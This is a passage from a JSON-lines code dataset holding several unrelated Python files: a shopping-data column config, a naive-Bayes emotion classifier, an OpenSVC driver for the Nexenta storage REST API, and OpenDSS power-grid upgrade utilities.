[\"VisitorType\", \"Month\"]\nY_COLUMN = \"Revenue\"\nX_CATEGORICAL_COLUMNS = [\n \"Administrative\",\n \"Informational\",\n \"ProductRelated\",\n \"Month\",\n \"OperatingSystems\",\n \"Browser\",\n \"Region\",\n \"TrafficType\",\n \"VisitorType\",\n \"Weekend\",\n]\nX_CONTINUES_COLUMNS = [\n \"Administrative_Duration\",\n \"Informational_Duration\",\n 
\"ProductRelated_Duration\",\n \"BounceRates\",\n \"ExitRates\",\n \"PageValues\",\n \"SpecialDay\",\n]\nCATEGORICAL_COLUMNS = [\n \"Administrative\",\n \"Informational\",\n \"ProductRelated\",\n \"Month\",\n \"OperatingSystems\",\n \"Browser\",\n \"Region\",\n \"TrafficType\",\n \"VisitorType\",\n \"Weekend\",\n \"Revenue\",\n]\nCONTINUES_COLUMNS = [\n \"Administrative_Duration\",\n \"Informational_Duration\",\n \"ProductRelated_Duration\",\n \"BounceRates\",\n \"ExitRates\",\n \"PageValues\",\n \"SpecialDay\",\n \"Revenue\",\n]\n","repo_name":"SynitCool/Online-Shoppers","sub_path":"model_testing/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"9123284557","text":"import numpy as np\nfrom nltk.corpus import stopwords\nfrom sklearn.naive_bayes import GaussianNB\nfrom nltk.tokenize import RegexpTokenizer\nwith open('angry.txt', 'r') as f:\n angry = f.read()\nwith open('happy.txt', 'r') as f:\n happy = f.read()\nwith open('sad.txt', 'r') as f:\n sad = f.read()\nwith open('kind.txt', 'r') as f:\n kind = f.read()\nwith open('nervous.txt', 'r') as f:\n nervous = f.read()\nwith open('shy.txt', 'r') as f:\n shy = f.read()\nwith open('test.txt', 'r') as f:\n test = f.read()\nsw=set(stopwords.words(\"english\"))\ndef remove_stopwords(words):\n wor=[w for w in words if w not in sw]\n return(wor)\ndef tokenizer_(text):\n text=text.lower()\n token=RegexpTokenizer(\"[a-zA-Z]+\")\n word=token.tokenize(text)\n word_list=remove_stopwords(word)\n #gimme=ngrams(word_list,2)\n #ps=PorterStemmer()\n #tokenized=[]\n #tokenized=[ps.stem(w) for w in word_list if ps.stem(w) not in tokenized ]\n #cv = CountVectorizer(tokenizer=tokenizer_, ngram_range=(1, 2))\n #vector = cv.fit_transform(tokenized).todense()\n #vc=vectorised_\n #length = sum(1 for el in gimme())\n #my_array = np.empty(length)\n #for i, el in enumerate(gimme()): my_array[i] = el\n return (word_list)\nangry=tokenizer_(angry)\nsad=tokenizer_(sad)\nnervous=tokenizer_(nervous)\nhappy=tokenizer_(happy)\nkind=tokenizer_(kind)\nshy=tokenizer_(shy)\nc1=len(angry)\nc2=len(angry)+len(sad)\nc3=len(angry)+len(sad)+len(happy)\nc4=len(shy)+len(angry)+len(sad)+len(happy)\nc5=len(angry)+len(sad)+len(happy)+len(shy)+len(kind)\nc6=len(angry)+len(sad)+len(happy)+len(shy)+len(nervous)+len(kind)\none=np.ones(c6)#1-Angry\none[:c2]*=2#sad\none[c2:c3]*=3#happy\none[c3:c4]*=4#shy\none[c4:c5]*=5#kind\none[c5:]*=6#nervous\nvocab_to_int = {i: w for i,w in enumerate(angry+sad+happy+shy+kind+nervous, 1)}\ndef text_tokenize(text):\n test=tokenizer_(text)\n int=[key for key,word in vocab_to_int.items() if word in test]\n int=np.array(int)\n return int\nX_train=np.array(list(vocab_to_int.keys()))\nX_train=X_train.reshape(-1,1)\nY_train=one\nX_test=text_tokenize(test).reshape(-1,1)\ndef softmax(x):\n e_x = np.exp(x - np.max(x))\n return e_x / e_x.sum()\ndef prediction(X_train,Y_train,X_test):\n nb=GaussianNB()\n nb.fit(X_train,Y_train)\n Y_pred=nb.predict(X_test)\n Pred=np.unique(Y_pred,return_counts=True)\n Class_=np.argmax(Pred[0])+1\n return Class_\ndef print_RES(r):\n if r==1:\n print(\"Angry : Negative\")\n elif r==2:\n print(\"Sad : Negative\")\n elif r==3:\n print(\"Happy : Positive\")\n elif r==4:\n print(\"Shy : Neutral\")\n elif r==5:\n print(\"Kind : Positive\")\n else:\n print(\"Nervous: 
Negative\")\nRESULT=prediction(X_train,Y_train,X_test)\nprint_RES(RESULT)","repo_name":"divyakshib/Sentiment-Analysis","sub_path":"Sentiment_Classifier.py","file_name":"Sentiment_Classifier.py","file_ext":"py","file_size_in_byte":2727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"9680964745","text":"import json\nimport base64\n\nimport core.exceptions as ex\nfrom foreign.six.moves.urllib.request import Request, urlopen # pylint: disable=import-error\nfrom foreign.six.moves.urllib.error import URLError # pylint: disable=import-error\nfrom utilities.naming import factory, split_path\nfrom utilities.string import base64encode\nfrom core.node import Node\n\nclass logger(object):\n def __init__(self):\n pass\n\n def info(self, msg):\n print(msg)\n\n def warning(self, msg):\n print(msg)\n\n def error(self, msg):\n print(msg)\n\nclass Nexenta(object):\n def __init__(self, head, log=None, node=None):\n self.object_type_cache = {}\n self.head = head\n self.auto_prefix = \"svc:/system/filesystem/zfs/auto-sync:\"\n self.username = None\n self.password = None\n self.port = 2000\n if node:\n self.node = node\n else:\n self.node = Node()\n if log is not None:\n self.log = log\n else:\n self.log = self.node.log\n\n def init(self):\n if self.username is not None and self.password is not None:\n return\n s = \"array#\" + self.head\n try:\n stype = self.node.oget(s, \"type\")\n except Exception:\n raise ex.Error(\"no array configuration for head %s\"%self.head)\n if stype != \"nexenta\":\n raise ex.Error(\"array %s type is not nexanta\" % self.head)\n try:\n self.username = self.node.oget(s, \"username\")\n except Exception:\n raise ex.Error(\"no username information for head %s\"%self.head)\n try:\n self.password = self.node.oget(s, \"password\")\n except Exception:\n raise ex.Error(\"no password information for head %s\"%self.head)\n self.port = self.node.oget(s, \"port\")\n try:\n secname, namespace, _ = split_path(self.password)\n self.password = factory(\"sec\")(secname, namespace=namespace, volatile=True).decode_key(\"password\")\n except Exception as exc:\n raise ex.Error(\"error decoding password: %s\" % exc)\n self.url = 'https://%(head)s:%(port)d/rest/nms/ '%dict(head=self.head, port=self.port)\n\n def rest(self, obj, method, params):\n self.init()\n data = {\"method\": method, \"params\": params, \"object\": obj}\n data = json.dumps(data)\n request = Request(self.url, data)\n base64string = base64encode('%s:%s' % (self.username, self.password))[:-1]\n request.add_header('Authorization', 'Basic %s' % base64string)\n request.add_header('Content-Type' , 'application/json')\n try:\n response = urlopen(request)\n except URLError:\n raise ex.Error(\"unreachable head %s\"%self.head)\n response = json.loads(response.read())\n return response\n\n def dbus_auth_keys_list(self):\n data = self.rest(\"appliance\", \"dbus_auth_keys_list\", [])\n if data['error'] is not None:\n raise ex.Error(data['error'])\n return data['result']\n\n def ssh_list_bindings(self):\n data = self.rest(\"appliance\", \"ssh_list_bindings\", [])\n if data['error'] is not None:\n raise ex.Error(data['error'])\n return data['result']\n\n def ssh_unbind(self, user, hostport, force=\"0\"):\n data = self.rest(\"appliance\", \"ssh_unbind\", [user, hostport, force])\n if data['error'] is not None:\n raise ex.Error(data['error'])\n return data['result']\n\n def ssh_bind(self, user, hostport, password):\n data = self.rest(\"appliance\", \"ssh_bind\", [user, hostport, 
password])\n if data['error'] is not None:\n raise ex.Error(data['error'])\n return data['result']\n\n def autosync_get_names(self):\n data = self.rest(\"autosync\", \"get_names\", [''])\n if data['error'] is not None:\n raise ex.Error(data['error'])\n return data['result']\n\n def autosync_disable(self, name):\n if not name.startswith(self.auto_prefix):\n name = self.auto_prefix+name\n data = self.rest(\"autosync\", \"disable\", [name])\n if data['error'] is not None:\n raise ex.Error(data['error'])\n return data['result']\n\n def autosync_enable(self, name):\n if not name.startswith(self.auto_prefix):\n name = self.auto_prefix+name\n data = self.rest(\"autosync\", \"enable\", [name])\n if data['error'] is not None:\n raise ex.Error(data['error'])\n return data['result']\n\n def autosync_execute(self, name):\n if not name.startswith(self.auto_prefix):\n name = self.auto_prefix+name\n data = self.rest(\"autosync\", \"execute\", [name])\n if data['error'] is not None:\n raise ex.Error(data['error'])\n return data['result']\n\n def autosync_get_state(self, name):\n if not name.startswith(self.auto_prefix):\n name = self.auto_prefix+name\n data = self.rest(\"autosync\", \"get_state\", [name])\n if data['error'] is not None:\n raise ex.Error(data['error'])\n return data['result']\n\n def autosync_set_prop(self, name, prop, value):\n if not name.startswith(self.auto_prefix):\n name = self.auto_prefix+name\n data = self.rest(\"autosync\", \"set_child_prop\", [name, prop, value])\n if data['error'] is not None:\n raise ex.Error(data[\"error\"])\n return data['result']\n\n def autosync_get_props(self, name):\n if not name.startswith(self.auto_prefix):\n name = self.auto_prefix+name\n data = self.rest(\"autosync\", \"get_child_props\", [name, ''])\n if data['error'] is not None:\n raise ex.Error(data[\"error\"])\n return data['result']\n\n def autosync_register(self, name):\n if not name.startswith(self.auto_prefix):\n name = self.auto_prefix+name\n data = self.rest(\"runner\", \"register\", [name, {}, {}])\n if data['error'] is not None:\n raise ex.Error(data[\"error\"])\n return data['result']\n\n def zvol_clone(self, src, dst):\n data = self.rest(\"zvol\", \"clone\", [src, dst])\n if data['error'] is not None:\n raise ex.Error(data[\"error\"])\n\n def folder_clone(self, src, dst):\n data = self.rest(\"folder\", \"clone\", [src, dst])\n if data['error'] is not None:\n raise ex.Error(data[\"error\"])\n\n def clone(self, src, dst):\n snap = \"@\".join([src, dst.replace('/','_')])\n object_type = self.object_type(src)\n if object_type == \"folder\":\n self.folder_clone(snap, dst)\n elif object_type == \"zvol\":\n self.zvol_clone(snap, dst)\n else:\n raise ex.Error(\"object type %s is not cloneable\"%str(object_type))\n\n def snapshot_create(self, src, dst, recursive=0):\n dst = dst.replace('/','_')\n object_type = self.object_type(src)\n if object_type == \"folder\":\n self.folder_snapshot(src, dst, recursive)\n elif object_type == \"zvol\":\n self.zvol_snapshot(src, dst, recursive)\n else:\n raise ex.Error(\"object type %s is not snapable\"%str(object_type))\n\n def zvol_snapshot(self, src, dst, recursive=0):\n data = self.rest(\"zvol\", \"create_snapshot\", [src, dst, recursive])\n if data['error'] is not None:\n raise ex.Error(data[\"error\"])\n\n def folder_snapshot(self, src, dst, recursive=0):\n snap = \"@\".join([src, dst])\n data = self.rest(\"snapshot\", \"create\", [snap, recursive])\n if data['error'] is not None:\n raise ex.Error(data[\"error\"])\n\n def snapshot_destroy(self, src, dst, 
recursive=''):\n snap = \"@\".join([src, dst])\n data = self.rest(\"snapshot\", \"destroy\", [snap, recursive])\n if data['error'] is not None:\n raise ex.Error(data[\"error\"])\n\n def snapshot_get_names(self):\n data = self.rest(\"snapshot\", \"get_names\", [''])\n if data['error'] is not None:\n raise ex.Error(data[\"error\"])\n return data['result']\n\n def folder_get_names(self):\n data = self.rest(\"folder\", \"get_names\", [''])\n if data['error'] is not None:\n raise ex.Error(data[\"error\"])\n for folder in data['result']:\n self.object_type_cache[folder] = \"folder\"\n return data['result']\n\n def zvol_get_names(self):\n data = self.rest(\"zvol\", \"get_names\", [''])\n if data['error'] is not None:\n raise ex.Error(data[\"error\"])\n for zvol in data['result']:\n self.object_type_cache[zvol] = \"zvol\"\n return data['result']\n\n def object_type(self, o):\n if o in self.object_type_cache:\n return self.object_type_cache[o]\n if o in self.folder_get_names():\n self.object_type_cache[o] = \"folder\"\n return \"folder\"\n elif o in self.zvol_get_names():\n self.object_type_cache[o] = \"zvol\"\n return \"zvol\"\n else:\n raise ex.Error(\"can not determine type of object %s\"%o)\n\n def set_prop(self, name, prop, val):\n otype = self.object_type(name)\n return self._set_prop(otype, name, prop, val)\n\n def _set_prop(self, otype, name, prop, val):\n data = self.rest(otype, \"set_child_prop\", [name, prop, val])\n if data['error'] is not None:\n raise ex.Error(data[\"error\"])\n return data['result']\n\n def get_props(self, name):\n otype = self.object_type(name)\n return self._get_props(otype, name)\n\n def _get_props(self, otype, name):\n data = self.rest(otype, \"get_child_props\", [name, ''])\n if data['error'] is not None:\n raise ex.Error(data[\"error\"])\n return data['result']\n\n def set_can_mount(self, name):\n p = self.get_props(name)\n if not 'canmount' in p:\n return\n self.set_prop(name, \"canmount\", \"on\")\n\n def autosync_set_can_mount(self, name):\n folders = self.folder_get_names()\n props = self.autosync_get_props(name)\n\n if props['zfs/from-host'] == 'localhost':\n synchead = props['zfs/from-fs']\n else:\n synchead = props['zfs/to-fs']\n\n synchead = synchead.lstrip('/')\n for folder in folders:\n if not folder.startswith(synchead):\n continue\n self.set_can_mount(folder)\n self.log.info(\"set 'canmount = on' on folder %s\"%folder)\n\n def snapclone(self, src, dst):\n self.snapshot_create(src, dst)\n self.clone(src, dst)\n\nif __name__ == \"__main__\":\n o = Nexenta(\"nexenta1\")\n #names = o.autosync_register(\"test\")\n #print(o.set_prop(\"vol1/folder1\", \"canmount\", \"on\"))\n #print(o.get_props(\"vol1/folder1\"))\n print(Nexenta(\"nexenta1\").dbus_auth_keys_list())\n print(Nexenta(\"nexenta2\").dbus_auth_keys_list())\n #print(o.autosync_set_can_mount(\"vol1-folder1-000\"))\n #names = o.autosync_get_names()\n #print(o.autosync_set_prop(names[0], \"zfs/reverse_capable\", \"1\"))\n #print(o.autosync_get_state(names[0]))\n #print(o.autosync_get_props(names[0]))\n #print(o.snapshot_create(\"vol1/zvol1\", \"test\"))\n #print(o.snapshot_get_names())\n #print(o.snapshot_destroy(\"vol1/zvol1\", \"test\"))\n #print(o.snapclone(\"vol1/folder1\", \"vol1/folder2\"))\n\n","repo_name":"opensvc/opensvc","sub_path":"opensvc/drivers/array/nexenta.py","file_name":"nexenta.py","file_ext":"py","file_size_in_byte":11354,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"66"} +{"seq_id":"19861425623","text":"import os\r\nimport 
math\r\nimport logging\r\nimport pathlib\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport opendssdirect as dss\r\n\r\nfrom .pydss_parameters import *\r\nfrom jade.utils.timing_utils import track_timing, Timer\r\n\r\nfrom disco import timer_stats_collector\r\nfrom disco.enums import LoadMultiplierType\r\nfrom disco.exceptions import (\r\n OpenDssCompileError,\r\n OpenDssConvergenceError,\r\n UpgradesExternalCatalogRequired,\r\n UpgradesExternalCatalogMissingObjectDefinition,\r\n InvalidOpenDssElementError,\r\n)\r\nfrom disco.models.upgrade_cost_analysis_generic_input_model import (\r\n _extract_specific_model_properties_, \r\n LineCodeCatalogModel, LineGeometryCatalogModel,\r\n LineModel, LineCatalogModel,\r\n TransformerModel, TransformerCatalogModel,\r\n)\r\nfrom disco.models.upgrade_cost_analysis_generic_output_model import UpgradesCostResultSummaryModel, \\\r\n CapacitorControllerResultType, VoltageRegulatorResultType, EquipmentUpgradeStatusModel\r\n\r\nlogger = logging.getLogger(__name__)\r\n\r\nDSS_XFMR_FLOAT_FIELDS = _extract_specific_model_properties_(model_name=TransformerModel, field_type_key=\"type\", field_type_value=\"number\")\r\nDSS_XFMR_INT_FIELDS = _extract_specific_model_properties_(model_name=TransformerModel, field_type_key=\"type\", field_type_value=\"integer\")\r\nDSS_LINE_FLOAT_FIELDS = _extract_specific_model_properties_(model_name=LineModel, field_type_key=\"type\", field_type_value=\"number\")\r\nDSS_LINE_INT_FIELDS = _extract_specific_model_properties_(model_name=LineModel, field_type_key=\"type\", field_type_value=\"integer\")\r\nDSS_LINECODE_FLOAT_FIELDS = _extract_specific_model_properties_(model_name=LineCodeCatalogModel, field_type_key=\"type\", field_type_value=\"number\")\r\nDSS_LINECODE_INT_FIELDS = _extract_specific_model_properties_(model_name=LineCodeCatalogModel, field_type_key=\"type\", field_type_value=\"integer\")\r\nDSS_LINEGEOMETRY_FLOAT_FIELDS = _extract_specific_model_properties_(model_name=LineGeometryCatalogModel, field_type_key=\"type\", field_type_value=\"number\")\r\nDSS_LINEGEOMETRY_INT_FIELDS = _extract_specific_model_properties_(model_name=LineGeometryCatalogModel, field_type_key=\"type\", field_type_value=\"integer\")\r\nDSS_UNIT_CONFIG = {1: \"mi\", 2: \"kft\", 3: \"m\", 4: \"Ft\", 5: \"in\", 6: \"cm\",\r\n 0: \"none\" # 0 maps to none, which means impedance units and line length units match\r\n }\r\n\r\n@track_timing(timer_stats_collector)\r\ndef reload_dss_circuit(dss_file_list, commands_list=None, **kwargs):\r\n \"\"\"This function clears the circuit and loads dss files and commands.\r\n Also solves the circuit and checks for convergence errors\r\n\r\n Parameters\r\n ----------\r\n dss_file_list\r\n commands_list\r\n\r\n Returns\r\n -------\r\n\r\n \"\"\"\r\n logger.info(\"Reloading OpenDSS circuit\")\r\n check_dss_run_command(\"clear\")\r\n if dss_file_list is None:\r\n raise Exception(\"No OpenDSS files have been passed to be loaded.\")\r\n for dss_file in dss_file_list:\r\n logger.info(f\"Redirecting '{dss_file}'.\")\r\n check_dss_run_command(f\"Redirect '{dss_file}'\")\r\n dc_ac_ratio = kwargs.get('dc_ac_ratio', None)\r\n if dc_ac_ratio is not None:\r\n change_pv_pctpmpp(dc_ac_ratio=dc_ac_ratio)\r\n if commands_list is not None:\r\n logger.info(f\"Running {len(commands_list)} dss commands\")\r\n for command_string in commands_list:\r\n check_dss_run_command(command_string)\r\n if \"new \" in command_string.lower():\r\n check_dss_run_command(\"CalcVoltageBases\")\r\n enable_pydss_solve = 
kwargs.get(\"enable_pydss_solve\", False)\r\n raise_exception = kwargs.get(\"raise_exception\", True)\r\n if enable_pydss_solve:\r\n pydss_params = define_initial_pydss_settings(**kwargs)\r\n circuit_solve_and_check(raise_exception=raise_exception, **pydss_params)\r\n return pydss_params\r\n else:\r\n max_control_iterations = kwargs.get(\"max_control_iterations\", None)\r\n if max_control_iterations is not None:\r\n dss.Solution.MaxControlIterations(max_control_iterations)\r\n circuit_solve_and_check(raise_exception=raise_exception)\r\n return kwargs\r\n\r\n\r\ndef run_selective_master_dss(master_filepath, **kwargs):\r\n \"\"\"This function executes master.dss file line by line and ignores some commands that Solve yearly mode,\r\n export or plot data.\r\n\r\n Parameters\r\n ----------\r\n master_filepath\r\n\r\n Returns\r\n -------\r\n\r\n \"\"\"\r\n run_dir = os.getcwd()\r\n check_dss_run_command(\"Clear\")\r\n # logger.info(\"Redirecting master file:\")\r\n # check_dss_run_command(f\"Redirect {master_filepath}\")\r\n\r\n # do this instead of redirect master to ignore some lines (e.g., that solve for the whole year)\r\n os.chdir(os.path.dirname(master_filepath))\r\n logger.debug(master_filepath)\r\n with open(master_filepath, \"r\") as fr:\r\n tlines = fr.readlines()\r\n for line in tlines:\r\n if ('Solve'.lower() in line.lower()) or ('Export'.lower() in line.lower()) or ('Plot'.lower() in line.lower()):\r\n logger.info(f\"Skipping this line: {line}\")\r\n continue\r\n else:\r\n check_dss_run_command(f\"{line}\")\r\n circuit_solve_and_check(raise_exception=True, **kwargs)\r\n os.chdir(run_dir)\r\n return\r\n\r\n\r\n@track_timing(timer_stats_collector)\r\ndef circuit_solve_and_check(raise_exception=False, **kwargs):\r\n \"\"\"This function solves the circuit (both OpenDSS and PyDSS-if enabled)\r\n and can raise exception if convergence error occurs\r\n\r\n Parameters\r\n ----------\r\n raise_exception\r\n kwargs\r\n\r\n Returns\r\n -------\r\n\r\n \"\"\"\r\n calcvoltagebases = kwargs.pop(\"calcvoltagebases\", False)\r\n if calcvoltagebases:\r\n check_dss_run_command(\"CalcVoltageBases\")\r\n dss_pass_flag = dss_solve_and_check(raise_exception=raise_exception)\r\n pass_flag = dss_pass_flag\r\n enable_pydss_solve = kwargs.get(\"enable_pydss_solve\", False)\r\n if enable_pydss_solve: # if pydss solver is also to be used\r\n pydss_pass_flag = pydss_solve_and_check(raise_exception=raise_exception, **kwargs)\r\n pass_flag = dss_pass_flag and pydss_pass_flag\r\n return pass_flag\r\n\r\n\r\ndef dss_solve_and_check(raise_exception=False):\r\n \"\"\"This function solves OpenDSS and returns bool flag which shows if it has converged or not.\r\n\r\n Parameters\r\n ----------\r\n raise_exception\r\n\r\n Returns\r\n -------\r\n bool\r\n \"\"\"\r\n dss.Solution.Solve()\r\n logger.debug(\"Solving circuit using OpenDSS\")\r\n # check_dss_run_command('CalcVoltageBases')\r\n dss_pass_flag = dss.Solution.Converged()\r\n if not dss_pass_flag:\r\n logger.info(f\"OpenDSS Convergence Error\")\r\n if raise_exception:\r\n raise OpenDssConvergenceError(\"OpenDSS solution did not converge\")\r\n return dss_pass_flag\r\n\r\n\r\ndef dss_run_command_list(command_list):\r\n for command_string in command_list:\r\n check_dss_run_command(command_string)\r\n return\r\n\r\n\r\ndef write_text_file(string_list, text_file_path, **kwargs):\r\n \"\"\"This function writes the string contents of a list to a text file\r\n\r\n Parameters\r\n ----------\r\n string_list\r\n text_file_path\r\n\r\n Returns\r\n -------\r\n\r\n \"\"\"\r\n 
num_new_lines = kwargs.get(\"num_new_lines\", 2)\r\n breaks = \"\\n\"*num_new_lines\r\n pathlib.Path(text_file_path).write_text(breaks.join(string_list))\r\n\r\n\r\ndef create_upgraded_master_dss(dss_file_list, upgraded_master_dss_filepath, original_master_filename=\"master.dss\"):\r\n \"\"\"Function to create master dss with redirects to upgrades dss file.\r\n The redirect paths in this file are:\r\n * absolute path - to the original master dss file\r\n * relative path (relative to the upgraded_master dss file) if upgrades dss file\"\"\"\r\n command_list = []\r\n for filename in dss_file_list:\r\n if os.path.basename(filename) == original_master_filename:\r\n new_filename = _get_master_dss_filepath(filename, upgraded_master_dss_filepath)\r\n else: \r\n new_filename = os.path.relpath(filename, os.path.dirname(upgraded_master_dss_filepath))\r\n command_list.append(f\"Redirect {new_filename}\")\r\n return command_list\r\n\r\n\r\ndef _get_master_dss_filepath(original_master, upgraded_master):\r\n if os.path.isabs(upgraded_master):\r\n # Here it is not possible to use a relative path in all cases.\r\n # The runtime output directory may have a different root than the source files.\r\n return os.path.abspath(original_master)\r\n\r\n return os.path.relpath(original_master, os.path.dirname(upgraded_master))\r\n\r\n\r\ndef create_dataframe_from_nested_dict(user_dict, index_names):\r\n \"\"\"This function creates dataframe from a nested dictionary\r\n\r\n Parameters\r\n ----------\r\n user_dict\r\n index_names\r\n\r\n Returns\r\n -------\r\n DataFrame\r\n \"\"\"\r\n df = pd.DataFrame.from_dict({(i, j): user_dict[i][j]\r\n for i in user_dict.keys()\r\n for j in user_dict[i].keys()},\r\n orient='index')\r\n df.index.names = index_names\r\n return df.reset_index()\r\n\r\n\r\ndef get_dictionary_of_duplicates(df, subset, index_field):\r\n \"\"\"This creates a mapping dictionary of duplicate indices in a dataframe\r\n\r\n Parameters\r\n ----------\r\n df\r\n subset\r\n index_field\r\n\r\n Returns\r\n -------\r\n Dictionary\r\n \"\"\"\r\n df.set_index(index_field, inplace=True)\r\n df = df[df.duplicated(keep=False, subset=subset)]\r\n tuple_list = df.groupby(subset).apply(lambda x: tuple(x.index)).tolist()\r\n mapping_dict = {v: tup[0] for tup in tuple_list for v in tup}\r\n return mapping_dict\r\n\r\n\r\ndef convert_length_units(length, unit_in, unit_out):\r\n \"\"\"Length unit converter\"\"\"\r\n LENGTH_CONVERSION = {'mm': 0.001, 'cm': 0.01, 'm': 1.0, 'km': 1000., \"mi\": 1609.34, \"kft\": 304.8, \r\n \"ft\": 0.3048, \"in\": 0.0254,}\r\n return length*LENGTH_CONVERSION[unit_in]/LENGTH_CONVERSION[unit_out]\r\n\r\n\r\ndef get_scenario_name(enable_pydss_solve, pydss_volt_var_model):\r\n \"\"\"This function determines the controller scenario \r\n\r\n Parameters\r\n ----------\r\n enable_pydss_solve : bool\r\n pydss_volt_var_model \r\n\r\n Returns\r\n -------\r\n str\r\n \"\"\"\r\n if enable_pydss_solve:\r\n # scenario = pydss_volt_var_model.control1 # TODO can read in name instead\r\n scenario = \"control_mode\"\r\n else:\r\n scenario = \"pf1\"\r\n return scenario\r\n\r\n\r\ndef convert_dict_nan_to_none(temp):\r\n \"\"\"Convert np.nan in dictionary to None.\r\n This does change the data type of the field.\"\"\"\r\n for key, value in temp.items():\r\n if isinstance(value, dict):\r\n df = pd.DataFrame([value])\r\n if df.isna().values.any():\r\n df = df.astype(object).where(df.notna(), None) # replace NaN with None\r\n value = df.to_dict() \r\n else:\r\n continue\r\n elif isinstance(value, list) and bool(value) 
and isinstance(value[0], dict): # list of dicts\r\n df = pd.DataFrame(value)\r\n if df.isna().values.any():\r\n df = df.astype(object).where(df.notna(), None) # replace NaN with None\r\n value = df.to_dict(orient=\"records\") \r\n else:\r\n continue \r\n temp[key] = value\r\n return temp\r\n\r\n\r\n@track_timing(timer_stats_collector)\r\ndef change_pv_pctpmpp(dc_ac_ratio):\r\n \"\"\"This function changes PV system pctpmpp based on passed dc-ac ratio\r\n newpctpmpp = oldpctpmpp / dc_ac_ratio\r\n \"\"\"\r\n dss.PVsystems.First()\r\n for i in range(dss.PVsystems.Count()):\r\n newpctpmpp = int(dss.Properties.Value('%Pmpp')) / dc_ac_ratio\r\n command_string = f\"Edit PVSystem.{dss.PVsystems.Name()} %Pmpp={newpctpmpp}\"\r\n check_dss_run_command(command_string)\r\n dss.PVsystems.Next()\r\n\r\n\r\ndef get_feeder_stats(dss):\r\n \"\"\"This function gives metadata stats for a feeder \r\n\r\n Parameters\r\n ----------\r\n dss\r\n\r\n Returns\r\n -------\r\n dict\r\n \"\"\"\r\n load_kw = 0\r\n load_kVABase = 0\r\n pv_kw = 0\r\n pv_kVARated = 0\r\n \r\n load_df = dss.utils.loads_to_dataframe()\r\n if len(load_df) > 0:\r\n load_kw = load_df['kW'].sum()\r\n load_kVABase = load_df['kVABase'].sum()\r\n if dss.PVsystems.Count() > 0:\r\n pv_df = dss.utils.pvsystems_to_dataframe()\r\n pv_kw = pv_df['kW'].sum()\r\n pv_kVARated = pv_df['kVARated'].sum()\r\n data_dict = {\r\n 'total_load(kVABase)': load_kVABase,\r\n 'total_load(kW)': load_kw,\r\n 'total_PV(kW)': pv_kw,\r\n 'total_PV(kVARated)': pv_kVARated,\r\n }\r\n return data_dict\r\n\r\n\r\ndef get_upgrade_stage_stats(dss, upgrade_stage, upgrade_type, xfmr_loading_df, line_loading_df, bus_voltages_df, **kwargs):\r\n \"\"\"This function gives upgrade stage stats for a feeder \r\n upgrade_stage can be Initial or Final\r\n upgrade_type can be thermal or voltage\r\n \r\n \"\"\"\r\n final_dict = {\"stage\": upgrade_stage, \"upgrade_type\": upgrade_type}\r\n ckt_info_dict = get_circuit_info()\r\n final_dict[\"feeder_components\"] = ckt_info_dict\r\n final_dict[\"feeder_components\"].update({\r\n \"num_nodes\": dss.Circuit.NumNodes(),\r\n \"num_loads\": dss.Loads.Count(),\r\n \"num_lines\": dss.Lines.Count(),\r\n \"num_transformers\": dss.Transformers.Count(),\r\n \"num_pv_systems\": dss.PVsystems.Count(),\r\n \"num_capacitors\": dss.Capacitors.Count(),\r\n \"num_regulators\": dss.RegControls.Count(),\r\n } )\r\n equipment_dict = combine_equipment_health_stats(xfmr_loading_df, line_loading_df, bus_voltages_df, **kwargs)\r\n final_dict.update(equipment_dict)\r\n return final_dict\r\n\r\n\r\ndef combine_equipment_health_stats(xfmr_loading_df, line_loading_df, bus_voltages_df, **kwargs):\r\n line_properties = kwargs.get(\"line_properties\", \r\n ['name', 'phases','normamps', 'kV', 'line_placement', 'length', 'units', 'max_amp_loading', \r\n 'max_per_unit_loading', 'status'])\r\n xfmr_properties = kwargs.get(\"xfmr_properties\", \r\n ['name', 'phases', 'windings', 'conns', 'kV', 'kVA', 'amp_limit_per_phase','max_amp_loading', \r\n 'max_per_unit_loading', 'status'] )\r\n voltage_properties = kwargs.get(\"voltage_properties\", \r\n ['name', 'max_per_unit_voltage', 'min_per_unit_voltage', 'overvoltage_violation', \r\n 'max_voltage_deviation', 'undervoltage_violation', 'min_voltage_deviation'])\r\n capacitors_df = kwargs.get(\"capacitors_df\", pd.DataFrame())\r\n regcontrols_df = kwargs.get(\"regcontrols_df\", pd.DataFrame())\r\n capacitor_properties = kwargs.get(\"capacitor_properties\", \r\n ['capacitor_name','capcontrol_present', 'capcontrol_type', 'capcontrol_name', 
'kv', 'kvar',\r\n 'phases', 'DeadTime', 'Delay', 'OFFsetting', 'ONsetting'])\r\n regcontrol_properties = kwargs.get(\"regcontrol_properties\", \r\n ['name', 'transformer', 'vreg', 'band', 'ptratio', 'delay', 'at_substation_xfmr_flag'])\r\n \r\n final_dict = {}\r\n # some file reformatting\r\n if \"windings\" in xfmr_properties:\r\n xfmr_loading_df[\"windings\"] = xfmr_loading_df[\"windings\"].astype(int)\r\n final_dict.update({\"transformer\": xfmr_loading_df[xfmr_properties].to_dict(orient=\"records\")})\r\n final_dict.update({\"line\": line_loading_df[line_properties].to_dict(orient=\"records\")})\r\n final_dict.update({\"bus_voltage\": bus_voltages_df[voltage_properties].to_dict(orient=\"records\")})\r\n if not capacitors_df.empty :\r\n final_dict.update({\"capacitor_control\": capacitors_df[capacitor_properties].to_dict(orient=\"records\")})\r\n else :\r\n final_dict.update({\"capacitor_control\": []})\r\n if not regcontrols_df.empty:\r\n final_dict.update({\"regulator_control\": regcontrols_df[regcontrol_properties].to_dict(orient=\"records\")})\r\n else:\r\n final_dict.update({\"regulator_control\": []})\r\n return final_dict\r\n\r\n\r\ndef get_circuit_info():\r\n \"\"\"This collects circuit information: source bus, feeder head info, substation xfmr information\r\n\r\n Returns\r\n -------\r\n Dictionary\r\n \"\"\"\r\n data_dict = {}\r\n dss.Vsources.First()\r\n data_dict['source_bus'] = dss.CktElement.BusNames()[0].split(\".\")[0]\r\n data_dict[\"feeder_head_name\"] = dss.Circuit.Name()\r\n dss.Circuit.SetActiveBus(data_dict['source_bus'])\r\n data_dict[\"feeder_head_basekv\"] = dss.Bus.kVBase()\r\n data_dict[\"source_num_nodes\"] = dss.Bus.NumNodes()\r\n data_dict[\"total_num_buses_in_circuit\"] = 